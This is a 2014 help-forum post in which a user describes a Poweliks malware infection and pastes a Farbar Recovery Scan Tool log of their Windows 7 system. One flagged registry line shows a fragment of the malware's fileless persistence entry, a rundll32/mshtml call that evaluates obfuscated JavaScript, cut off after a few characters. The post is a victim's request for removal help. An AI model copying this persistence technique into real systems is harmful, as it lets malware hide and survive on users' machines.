
poweliks infection, cant seem to kill it



#1 feralfreak


  • Members
  • 38 posts

Posted 26 October 2014 - 10:58 PM

I've been having some trouble with a bug that causes my dllhost.exe*32 to load multiple entries in Task Manager and bogs down my system, making the CPU run at 100 percent (I can end the processes but they come back minutes later, and eventually it makes the system crash to a BSOD; when I end the processes, if I do it on the right one it knocks the others down, but they all look the same so it's tough to find it). It makes PowerShell (whatever that is) stop working. I looked up what my problem might be and saw online references to Poweliks. I did a scan with RogueKiller and that confirmed the infection, but it hasn't been able to kill it; when I reboot, the infection is still there after that tool says it killed it. I also ran Farbar and the log confirmed that infection too.

 

In the past I've had trouble on this PC with ComboFix (I was told to use it, not a matter of using it on my own), because this PC is an Acer and didn't come with an OEM disc, only a way to make recovery DVDs, which proved to be an incompatibility with one of the steps needed in using ComboFix (I will NEVER buy Acer again!)

 

I'll paste the Farbar FRST log below:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 26-10-2014
Ran by adamlogan09052014 (administrator) on ADAMLOGAN-PC on 26-10-2014 23:07:11
Running from C:\Users\adamlogan09052014\Desktop
Loaded Profile: adamlogan09052014 (Available profiles: adamlogan11052012 & adamlogan10262013 & adamlogan09052014)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan 2.0\kss.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
(alch) C:\Program Files (x86)\ClamWin\bin\ClamTray.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(PortableApps.com) F:\ThunderbirdPortable\ThunderbirdPortable.exe
(Mozilla Messaging) F:\ThunderbirdPortable\App\Thunderbird\thunderbird.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(mozilla.org) C:\Program Files (x86)\SeaMonkey\seamonkey.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [ClamWin] => C:\Program Files (x86)\ClamWin\bin\ClamTray.exe [86016 2013-04-27] (alch)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [1486144 2013-05-13] (IObit)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-21-2928345798-992241452-311034125-1011\...\Run: [Yahoo! Pager] => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [4670704 2007-08-30] (Yahoo! Inc.)
HKU\S-1-5-21-2928345798-992241452-311034125-1011\...\Run: [Spybot-S&D Cleaning] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-2928345798-992241452-311034125-1011\...\MountPoints2: {813b7de2-21a9-11e3-9251-c89cdc6c6e74} - G:\Autorun.exe
HKU\S-1-5-21-2928345798-992241452-311034125-1011\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-18\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_12_0_0_70_ActiveX.exe -update activex
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://aol.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xB043194172C9CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files (x86)\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254

FireFox:
========
FF ProfilePath: C:\Users\adamlogan09052014\AppData\Roaming\Mozilla\Firefox\Profiles\25bza008.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_4_402_265.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @java.com/DTPlugin,version=10.17.2 -> C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.17.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_4_402_265.dll ()
FF Plugin-x32: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @java.com/DTPlugin,version=10.5.1 -> C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.5.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.3 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: Flash and Video Download - C:\Users\adamlogan09052014\AppData\Roaming\Mozilla\Firefox\Profiles\25bza008.default\Extensions\{bee6eb20-01e0-ebd1-da83-080329fb9a3a} [2014-09-25]
FF Extension: Define Ext - C:\Program Files (x86)\Mozilla Firefox\extensions\wyzlmrij@zekkpxc.com [2013-09-16]
FF HKLM-x32\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5
FF Extension: DivX Plus Web Player HTML5 <video> - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2012-07-30]

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [hlbdjjeemlolafejlbganpfgepihjplk] - C:\ProgramData\wxDfast\hlbdjjeemlolafejlbganpfgepihjplk.crx []
CHR HKLM-x32\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files (x86)\DivX\DivX Plus Web Player\chrome\DivXHTML5\DivXHTML5.crx [2011-12-12]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 EFS; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [335168 2013-04-25] (IObit)
R3 KeyIso; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
R2 KSS; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan 2.0\kss.exe [202328 2012-12-07] (Kaspersky Lab ZAO)
S2 LavasoftAdAwareService11; C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.1.5354.0\AdAwareService.exe [702744 2014-01-23] ()
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2014-03-11] (Microsoft Corporation)
S3 Netlogon; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [347872 2014-03-11] (Microsoft Corporation)
S4 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
S4 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [167424 2012-12-07] () [File not signed]
S3 ProtectedStorage; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
R2 SamSs; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 Spooler; C:\Windows\SysWOW64\spoolsv.exe [0 2013-10-26] () [File not signed]
S3 VaultSvc; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
S4 WSWNDA3100v2; C:\Program Files (x86)\NETGEAR\WNDA3100v2\WifiSvc.exe [307928 2013-12-30] ()

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [270616 2014-07-02] (AVG Technologies CZ, s.r.o.)
R3 FileMonitor; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\FileMonitor.sys [23048 2013-03-23] (IObit)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [268512 2014-01-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [133928 2014-03-11] (Microsoft Corporation)
S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [34336 2013-03-26] (IObit.com)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-23] ()
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
R3 UrlFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\UrlFilter.sys [23016 2013-03-26] (IObit.com)
S1 nzdegkzv; \??\C:\Windows\system32\drivers\nzdegkzv.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 23:06 - 2014-10-26 23:07 - 00000000 ____D () C:\FRST
2014-10-26 23:05 - 2014-10-26 23:05 - 02113024 _____ (Farbar) C:\Users\adamlogan09052014\Desktop\FRST64.exe
2014-10-23 04:03 - 2014-10-23 04:03 - 00002896 _____ () C:\Users\adamlogan09052014\Desktop\RKreport_SCN_10232014_040000.log
2014-10-23 03:45 - 2014-10-23 04:17 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-23 03:44 - 2014-10-23 03:44 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-23 03:28 - 2014-10-23 03:44 - 16281688 _____ () C:\Users\adamlogan09052014\Desktop\RogueKiller.exe
2014-10-22 23:54 - 2014-10-23 03:23 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-22 23:51 - 2014-10-23 03:23 - 00000000 ____D () C:\Users\adamlogan09052014\Desktop\mbar
2014-10-22 23:45 - 2014-10-22 23:51 - 14349744 _____ (Malwarebytes Corp.) C:\Users\adamlogan09052014\Desktop\mbar-1.07.0.1012.exe
2014-10-22 23:40 - 2014-10-22 23:40 - 00401920 _____ (Farbar) C:\Users\adamlogan09052014\Desktop\MiniToolBox.exe
2014-10-22 23:37 - 2014-10-22 23:37 - 00415232 _____ (Farbar) C:\Users\adamlogan09052014\Desktop\FSS.exe
2014-10-22 23:35 - 2014-10-22 23:35 - 00854448 _____ () C:\Users\adamlogan09052014\Desktop\SecurityCheck.exe
2014-10-22 23:32 - 2014-10-22 23:32 - 00373512 _____ () C:\Windows\Minidump\102214-64334-01.dmp
2014-10-22 17:43 - 2014-10-22 17:43 - 00373544 _____ () C:\Windows\Minidump\102214-49577-01.dmp
2014-10-22 07:35 - 2014-10-22 07:35 - 00000279 _____ () C:\Users\adamlogan09052014\Desktop\IObit Malware Fighter Report.log
2014-10-22 07:07 - 2014-10-22 07:07 - 00001177 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-10-22 07:07 - 2014-10-22 07:07 - 00000000 ____D () C:\Users\adamlogan09052014\AppData\Roaming\IObit
2014-10-22 07:07 - 2014-10-22 07:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-10-22 07:07 - 2014-10-22 07:07 - 00000000 ____D () C:\ProgramData\IObit
2014-10-22 07:07 - 2014-10-22 07:07 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-10-22 07:04 - 2014-10-22 07:06 - 19362952 _____ (IObit ) C:\Users\adamlogan09052014\Desktop\imfv2-setup-for-review.exe
2014-10-22 05:22 - 2014-10-22 05:22 - 00000000 ____D () C:\Users\adamlogan09052014\Desktop\New folder
2014-10-22 04:53 - 2014-10-22 04:53 - 01602014 _____ () C:\Users\adamlogan09052014\Desktop\Group1.zip
2014-10-22 04:53 - 2014-10-22 04:53 - 00000000 ____D () C:\Users\adamlogan09052014\AppData\Local\Symantec Power Eraser
2014-10-22 04:07 - 2014-10-22 04:08 - 00000000 ____D () C:\ProgramData\SMR430
2014-10-22 04:06 - 2014-10-22 04:06 - 00058016 _____ () C:\Windows\SysWOW64\GDIPFONTCACHEV1.DAT
2014-10-22 04:04 - 2014-10-22 04:05 - 07043752 _____ (Symantec Corporation) C:\Users\adamlogan09052014\Desktop\SymHelp.exe
2014-10-22 01:55 - 2014-10-22 01:54 - 01962496 _____ () C:\Users\adamlogan09052014\Desktop\AdwCleaner.exe
2014-10-10 10:41 - 2014-10-10 10:41 - 01700624 _____ () C:\Windows\Minidump\101014-56643-01.dmp
2014-10-10 04:34 - 2014-10-10 04:35 - 01375089 _____ () C:\Users\adamlogan09052014\Downloads\adwcleaner_3.311.exe
2014-10-09 22:13 - 2014-10-09 22:13 - 00373488 _____ () C:\Windows\Minidump\100914-32276-01.dmp
2014-10-09 20:35 - 2014-10-09 20:36 - 02476596 _____ (Trend Micro Inc.) C:\Users\adamlogan09052014\Downloads\HousecallLauncher64 (2).exe
2014-10-09 04:53 - 2014-10-09 04:54 - 00642096 _____ () C:\Windows\Minidump\100914-43227-01.dmp
2014-10-08 07:36 - 2014-10-08 07:36 - 00000000 ____D () C:\Users\adamlogan11052012\AppData\Roaming\AVG2015
2014-10-08 07:36 - 2014-10-08 07:36 - 00000000 ____D () C:\Users\adamlogan11052012\AppData\Local\Avg2015
2014-09-28 05:41 - 2014-09-28 05:41 - 08472669 _____ (alch ) C:\Users\adamlogan09052014\Downloads\clamwin-0.98.4.1-setup-nodb.exe
2014-09-27 03:45 - 2014-09-27 03:45 - 00373520 _____ () C:\Windows\Minidump\092714-56503-01.dmp

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 23:16 - 2012-07-10 01:07 - 02088125 _____ () C:\Windows\WindowsUpdate.log
2014-10-26 22:40 - 2009-07-14 00:45 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-26 22:40 - 2009-07-14 00:45 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-26 22:35 - 2014-09-20 05:00 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-26 22:33 - 2014-09-05 23:10 - 00000000 ____D () C:\Users\adamlogan09052014\AppData\Roaming\Thunderbird
2014-10-26 22:30 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-26 22:30 - 2009-07-14 00:51 - 00121130 _____ () C:\Windows\setupact.log
2014-10-22 23:54 - 2014-06-25 07:11 - 00128728 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-22 23:52 - 2014-06-25 07:10 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-22 23:33 - 2012-07-10 02:50 - 00000000 ____D () C:\Program Files (x86)\SeaMonkey
2014-10-22 23:32 - 2012-11-25 03:04 - 00000000 ____D () C:\Windows\Minidump
2014-10-22 23:31 - 2012-11-25 03:04 - 445944578 _____ () C:\Windows\MEMORY.DMP
2014-10-22 22:43 - 2013-07-12 03:14 - 00001586 _____ () C:\Windows\wininit.ini
2014-10-22 04:56 - 2012-11-08 02:39 - 00000000 ____D () C:\Users\adamlogan11052012
2014-10-22 02:56 - 2010-11-20 23:47 - 00300048 _____ () C:\Windows\PFRO.log
2014-10-22 02:53 - 2014-09-19 21:02 - 00000000 ____D () C:\AdwCleaner
2014-10-11 13:04 - 2014-09-05 22:18 - 00000000 ____D () C:\Users\adamlogan09052014\Desktop\reload as of 9 5 2014
2014-10-11 09:15 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\AppCompat
2014-10-11 09:13 - 2014-06-25 07:10 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-10 16:01 - 2013-05-17 06:22 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2014-10-10 11:32 - 2012-08-25 20:28 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-10-09 22:15 - 2013-10-26 07:46 - 00000000 ____D () C:\Users\adamlogan10262013
2014-10-09 22:15 - 2013-10-25 05:44 - 00000000 ____D () C:\Users\adamlogan10252013
2014-10-09 22:15 - 2012-10-24 01:10 - 00000000 ____D () C:\Users\adamlogan10242012
2014-10-09 22:15 - 2012-09-17 23:57 - 00000000 ____D () C:\Users\adamlogan09162012
2014-10-09 22:15 - 2012-09-02 00:42 - 00000000 ____D () C:\Users\adamlogan09022012
2014-10-09 22:15 - 2012-08-17 22:53 - 00000000 ____D () C:\Users\adamlogan08172012
2014-10-09 22:15 - 2012-08-03 22:09 - 00000000 ____D () C:\Users\adamlogan08032012
2014-10-09 22:15 - 2012-07-09 23:03 - 00000000 ____D () C:\Users\adamlogan
2014-10-09 21:04 - 2014-09-20 00:30 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-09 20:58 - 2014-09-20 05:07 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-09 20:52 - 2014-09-18 00:38 - 00183038 _____ () C:\Users\adamlogan09052014\AppData\Local\ars.cache
2014-10-09 20:52 - 2014-09-18 00:38 - 00101771 _____ () C:\Users\adamlogan09052014\AppData\Local\census.cache
2014-10-09 20:50 - 2014-09-18 00:35 - 00000010 _____ () C:\Users\adamlogan09052014\AppData\Local\sponge.last.runtime.cache

Files to move or delete:
====================
C:\Users\adamlogan11052012\jagex_cl_runescape_LIVE.dat
C:\Users\adamlogan11052012\jagex_cl_runescape_LIVE1.dat
C:\Users\adamlogan11052012\random.dat
C:\ProgramData\2lc0b17.fvv
C:\ProgramData\2lc0b17.reg


Some content of TEMP:
====================
C:\Users\adamlogan09052014\AppData\Local\Temp\dllnt_dump.dll
C:\Users\adamlogan09052014\AppData\Local\Temp\Quarantine.exe
C:\Users\adamlogan09052014\AppData\Local\Temp\stuprt.exe
C:\Users\adamlogan10252013\AppData\Local\Temp\2jfuweif.exe
C:\Users\adamlogan10252013\AppData\Local\Temp\AskSLib.dll
C:\Users\adamlogan10252013\AppData\Local\Temp\htc-sync.exe
C:\Users\adamlogan10252013\AppData\Local\Temp\InstallFlashPlayer.exe
C:\Users\adamlogan10252013\AppData\Local\Temp\IWX3U5NW.exe
C:\Users\adamlogan10252013\AppData\Local\Temp\System.Data.SQLite.dll
C:\Users\adamlogan10252013\AppData\Local\Temp\tbVafm.dll
C:\Users\adamlogan10252013\AppData\Local\Temp\vcredist_x64.exe
C:\Users\adamlogan11052012\AppData\Local\Temp\2jfuweif.exe
C:\Users\adamlogan11052012\AppData\Local\Temp\AskSLib.dll
C:\Users\adamlogan11052012\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpg_dqi0.dll
C:\Users\adamlogan11052012\AppData\Local\Temp\htc-sync.exe
C:\Users\adamlogan11052012\AppData\Local\Temp\InstallFlashPlayer.exe
C:\Users\adamlogan11052012\AppData\Local\Temp\IWX3U5NW.exe
C:\Users\adamlogan11052012\AppData\Local\Temp\System.Data.SQLite.dll
C:\Users\adamlogan11052012\AppData\Local\Temp\tbVafm.dll
C:\Users\adamlogan11052012\AppData\Local\Temp\vcredist_x64.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-16 08:24

==================== End Of Log ============================

 

 

Can someone help me kill this? I also can't download anything in Internet Explorer; I keep getting something saying my settings don't allow that. My History folder won't keep more than a day's worth of entries (I think it's because of this bug). I tried going into Internet Options and set it back to 21 days where it was set at 0 (likely by the bug), but when that didn't work I tried going back to see if it was changed on me again, and the thing to click on to access Internet Options was greyed out (it was something in the little thing that looks like a gear; I can click on the gear, but after that the part I needed was greyed out). I wish I could find who wrote this bug and break his fingers off.

 

As I am writing this I noticed another symptom of this infection, at least I think it might be: when that dllhost thing starts up, the browser I'm using, umm (I don't know what it's called), acts like there is something else that was clicked on, where the top of the browser that has the minimize/maximize/X thing greys out, like it would if you were to click on Yahoo Instant Messenger or Thunderbird or something. I'm typing all this in Mozilla SeaMonkey if that helps (I'm trying to be as accurate as possible).
